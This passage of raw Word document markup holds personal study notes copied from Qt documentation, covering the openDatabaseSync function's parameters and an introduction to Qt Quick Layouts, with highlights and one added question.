      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object openDatabaseSync(string name</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> string version</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> string description</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> estimated_size</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> jsobject callback(db))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Opens or creates a local storage sql database by the given parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is the database name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is the database version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the database display name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>estimated_size</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the database's estimated size, in bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="008F1DE7" w:rsidRDefault="0068181D" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is an optional parameter, which is invoked if the database has not yet been created.</w:t>
      </w:r>
      <w:r w:rsidR="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7" w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00464480" w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What are its possible uses?</w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7" w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="00464480" w:rsidRDefault="0068181D" w:rsidP="00464480">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Retur</w:t>
      </w:r>
      <w:r w:rsidR="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ns the created database object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1668" w:history="1">
        <w:r w:rsidR="00464480" w:rsidRPr="008D56D4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquicklayouts-index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRPr="00464480" w:rsidRDefault="00464480" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1376" w:name="_Toc483000825"/>
      <w:bookmarkStart w:id="1377" w:name="_Toc483003818"/>
      <w:bookmarkStart w:id="1378" w:name="_Toc483604171"/>
      <w:bookmarkStart w:id="1379" w:name="_Toc483605391"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Layouts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1376"/>
      <w:bookmarkEnd w:id="1377"/>
      <w:bookmarkEnd w:id="1378"/>
      <w:bookmarkEnd w:id="1379"/>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRPr="00464480" w:rsidRDefault="00464480" w:rsidP="00464480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt Quick Layouts are a set of QML types </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>used to arrange items in a user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contrast to</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1669" w:history="1">
        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>positioners</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Qt Quick Layouts </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can also resize</w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> their items. This makes them </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>well suited for resizable user interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Since layouts are items they can consequently be nested.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRPr="00464480" w:rsidRDefault="00464480" w:rsidP="00464480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The module is new in Qt 5.1 and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requires</w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1670" w:history="1">
        <w:r w:rsidRPr="00464480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRDefault="00464480" w:rsidP="00464480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visit the</w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1671" w:history="1">
        <w:r w:rsidRPr="00464480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Layouts Overview</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>page to get started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00464480" w:rsidRDefault="00C570D9" w:rsidP="00464480">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00464480" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1672" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="008D56D4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquicklayouts-overview.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1380" w:name="_Toc483000826"/>
      <w:bookmarkStart w:id="1381" w:name="_Toc483003819"/>
      <w:bookmarkStart w:id="1382" w:name="_Toc483604172"/>
      <w:bookmarkStart w:id="1383" w:name="_Toc483605392"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
